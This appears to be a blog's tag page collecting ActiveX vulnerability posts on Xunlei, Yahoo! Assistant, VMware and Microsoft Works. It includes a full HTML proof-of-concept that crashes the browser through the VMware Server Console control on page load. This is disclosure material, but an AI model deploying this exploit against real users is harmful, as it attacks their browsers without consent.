Posts tagged 'Activex'
Microsoft Office Snapshot Viewer ActiveX Exploit
Xunlei (Thunder) ActiveX Control Remote Code Execution Vulnerability
by cocoruder(frankruer_at_hotmail.com)
http://ruder.cdut.net
Summary:
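Xunlei (Thunder) is a download manager based on P2SP technology that is very popular in China. For more details, see:
A remote code execution vulnerability exists in an ActiveX control in Xunlei 5. A remote attacker can exploit it to execute arbitrary code on the victim's system with the privileges of the current browser, and can then install trojans and spyware.
Tags: Activex, Xunlei
VMware Server Console ActiveX DOS POC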
<html>
<title>VMware Server Console ActiveX DOS POC</title>
<!--
Author:Shennan Wang
blog:http://hi.baidu.com/nansec
stuff:http://www.d4rkn3t.cn
thanks:
Robinh00d,ayarei,void
-->
<head>
<script language="JavaScript">
function test() {
var bufA = "2";
var bufB = "0";
var bufC = "0";
var bufD = "8";
for (i = 0; i < 2008; i++) {
bufA += bufA;}
for (i = 0; i < 2008; i++){
bufB += bufB;}
for (i = 0; i < 2008; i++){
bufC += bufC;}
for (i = 0; i < 2008; i++){
bufD += bufD;}
nansec.DoModalDirect(bufA,bufB,bufC,bufD);}
</script>
</head>
<body onload="JavaScript: return test();">
<object classid="clsid:D2C53A29-B43A-4367-B808-52CE785BBF36" id="nansec">
</object>
</body>
</html>
# milw0rm.com [2008-05-28]
Tags: Activex, POC, VMware
Yahoo! Assistant (3721) ActiveX Remote Code Execution Vulnerability
Source:
Discovered by: Sowhat of Nevis Labs
Date: 2008.05.06
http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt
CVE: N/A
Vendor:
Yahoo! CN
Affected versions:
Yahoo! Assistant <= 3.6 (versions before 04/23/2008)
Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit
<!--
The problem is in the wkimgsrv.dll module shipped with many MS Office
Suites (tested on MS OF 2003, MS OF 2007).
Actually, this is not a case of a buffer overflow attack, just an exploit
of the insecure method WKsPictureInterface.
Setting this point to anywhere in memory and IE will crash when
wkimgsrv is trying to access an invalid memory location.